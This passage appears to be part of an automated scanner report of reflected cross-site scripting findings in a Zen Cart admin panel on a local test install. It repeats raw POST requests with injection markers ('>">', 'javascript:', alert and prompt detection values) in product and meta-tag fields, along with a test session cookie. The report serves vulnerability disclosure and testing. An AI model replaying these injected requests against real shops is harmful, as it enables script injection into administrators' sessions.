    Englishalert(14405309.65187) Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------32072267314898 Content-Length: 4983 -----------------------------32072267314898 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="master_category" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------32072267314898 Content-Disposition: form-data; name="products_status" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------32072267314898 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------32072267314898 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[1]" -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------32072267314898 Content-Disposition: form-data; name="products_model" testval -----------------------------32072267314898 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------32072267314898 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------32072267314898 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------32072267314898 Content-Disposition: form-data; name="image_delete" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="overwrite" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_weight" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="search" test -----------------------------32072267314898 Content-Disposition: form-data; name="x" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="y" 0 -----------------------------32072267314898-- HTTP Response ----Truncated due to large size --- " class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.
    English admin $12.00
    3ds/25
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Detection value: alert(14405309.65627) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------32072267314898 Content-Length: 4986 -----------------------------32072267314898 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="master_category" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------32072267314898 Content-Disposition: form-data; name="products_status" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------32072267314898 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------32072267314898 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[1]" test -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------32072267314898 Content-Disposition: form-data; name="products_model" testval -----------------------------32072267314898 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------32072267314898 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------32072267314898 Content-Disposition: form-data; name="img_dir" >"> -----------------------------32072267314898 Content-Disposition: form-data; name="image_delete" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="overwrite" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_weight" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="search" test -----------------------------32072267314898 Content-Disposition: form-data; name="x" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="y" 0 -----------------------------32072267314898-- HTTP Response ----Truncated due to large size --- Manager
  • Media Types
  • admin admin $12.00
    25" border="0" alt=">">25" title=" >">25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.65777) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------32072267314898 Content-Length: 4988 -----------------------------32072267314898 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="master_category" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------32072267314898 Content-Disposition: form-data; name="products_status" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------32072267314898 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------32072267314898 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[1]" test -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------32072267314898 Content-Disposition: form-data; name="products_model" testval -----------------------------32072267314898 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------32072267314898 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------32072267314898 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------32072267314898 Content-Disposition: form-data; name="image_delete" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="overwrite" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_image_manual" >"> -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_weight" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="search" test -----------------------------32072267314898 Content-Disposition: form-data; name="x" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="y" 0 -----------------------------32072267314898-- HTTP Response ----Truncated due to large size --- ger
  • Media Types
  • admin admin $12.00
    " border="0" alt="3ds/>">" title=" 3ds/>"> " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.65837) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------32072267314898 Content-Length: 4970 -----------------------------32072267314898 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="master_category" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------32072267314898 Content-Disposition: form-data; name="products_status" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------32072267314898 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------32072267314898 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[1]" test -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------32072267314898 Content-Disposition: form-data; name="products_model" testval -----------------------------32072267314898 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------32072267314898 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------32072267314898 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------32072267314898 Content-Disposition: form-data; name="image_delete" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="overwrite" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[2]" >"> -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_weight" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="search" test -----------------------------32072267314898 Content-Disposition: form-data; name="x" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="y" 0 -----------------------------32072267314898-- HTTP Response ----Truncated due to large size --- h="100%" cellspacing="0" cellpadding="2">
    admin admin $12.00
    3ds/25Default text
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Finding 3.37: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_url[1] Injection value: >"> Detection value: alert(14405309.66027) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------32072267314898 Content-Length: 4970 -----------------------------32072267314898 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="master_category" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------32072267314898 Content-Disposition: form-data; name="products_status" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------32072267314898 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------32072267314898 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[1]" test -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------32072267314898 Content-Disposition: form-data; name="products_model" testval -----------------------------32072267314898 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------32072267314898 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------32072267314898 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------32072267314898 Content-Disposition: form-data; name="image_delete" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="overwrite" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[1]" >"> -----------------------------32072267314898 Content-Disposition: form-data; name="products_weight" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="search" test -----------------------------32072267314898 Content-Disposition: form-data; name="x" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="y" 0 -----------------------------32072267314898-- HTTP Response ----Truncated due to large size --- "100%" cellspacing="0" cellpadding="2">
    English admin $12.00
    English admin $12.00
    3ds/25test
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Injection URI: http://localhost:8081/zen-cart/admin1/attributes_controller.php?action=javascript:&attribute_page=1&products_filter=3 Injected item: GET+POST : action Injection value: javascript: Reflection URI: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1 Detection string: prompt(14405309.69347) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------76712324410 Content-Length: 4930 -----------------------------76712324410 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------76712324410 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------76712324410 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------76712324410 Content-Disposition: form-data; name="master_category" 1 -----------------------------76712324410 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------76712324410 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------76712324410 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------76712324410 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------76712324410 Content-Disposition: form-data; name="products_status" 0 -----------------------------76712324410 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------76712324410 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------76712324410 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------76712324410 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------76712324410 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------76712324410 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------76712324410 Content-Disposition: form-data; name="products_price" 12 -----------------------------76712324410 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------76712324410 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------76712324410 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------76712324410 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------76712324410 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------76712324410 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------76712324410 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------76712324410 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------76712324410 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------76712324410 Content-Disposition: form-data; name="products_model" testval -----------------------------76712324410 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------76712324410 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------76712324410 Content-Disposition: form-data; name="image_delete" 0 -----------------------------76712324410 Content-Disposition: form-data; name="overwrite" 1 -----------------------------76712324410 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------76712324410 Content-Disposition: form-data; name="products_weight" 0 -----------------------------76712324410 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------76712324410 Content-Disposition: form-data; name="search" test -----------------------------76712324410 Content-Disposition: form-data; name="x" 0 -----------------------------76712324410 Content-Disposition: form-data; name="y" 0 -----------------------------76712324410 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------76712324410 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------76712324410 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------76712324410 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------76712324410 Content-Disposition: form-data; name="products_description[1]" '"--> -----------------------------76712324410 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------76712324410 Content-Disposition: form-data; name="products_image" 3ds/25 -----------------------------76712324410 Content-Disposition: form-data; name="search" test -----------------------------76712324410-- HTTP Response ----Truncated due to large size ---
    ID Categories / Products Model Price/Special/Sale   Quantity    Status Sort Action 
    1 Preview  testval $12.00 1222110   Product is Linked
    0 Finding 3.39: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: metatags_keywords[2] Injection value: Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview_meta_tags&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=2&action=new_product_meta_tags Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------272002940131886 Content-Length: 1932 -----------------------------272002940131886 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_products_name_status" 1 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_title_status" 0 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_model_status" 0 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_price_status" 1 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_title_tagline_status" 0 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_title[2]" testval -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_keywords[2]" -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_description[2]" Default text -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_title[1]" testval -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_keywords[1]" Passwor1 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_description[1]" Default text -----------------------------272002940131886 Content-Disposition: form-data; name="products_model" testval -----------------------------272002940131886 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------272002940131886 Content-Disposition: form-data; name="x" 0 -----------------------------272002940131886 Content-Disposition: form-data; name="y" 0 -----------------------------272002940131886-- HTTP Response ----Truncated due to large size --- admin Products Name:  Products Model: EXCLUDED Price: $12.00 Title/Tagline: EXCLUDED
    Meta Tag Title:  EXCLUDED
    Meta Tag Keywords: 
    Meta Tag Description:  Default text
    English Products Name: admin Products Model: EXCLUDED Price: $12.00 Title/Tagline:&nb Finding 3.40: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: metatags_description[2] Injection value: Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview_meta_tags&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=2&action=new_product_meta_tags Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------272002940131886 Content-Length: 1928 -----------------------------272002940131886 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_products_name_status" 1 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_title_status" 0 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_model_status" 0 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_price_status" 1 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_title_tagline_status" 0 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_title[2]" testval -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_keywords[2]" Passwor1 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_description[2]" -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_title[1]" testval -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_keywords[1]" Passwor1 -----------------------------272002940131886 Content-Disposition: form-data; name="metatags_description[1]" Default text -----------------------------272002940131886 Content-Disposition: form-data; name="products_model" testval -----------------------------272002940131886 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------272002940131886 Content-Disposition: form-data; name="x" 0 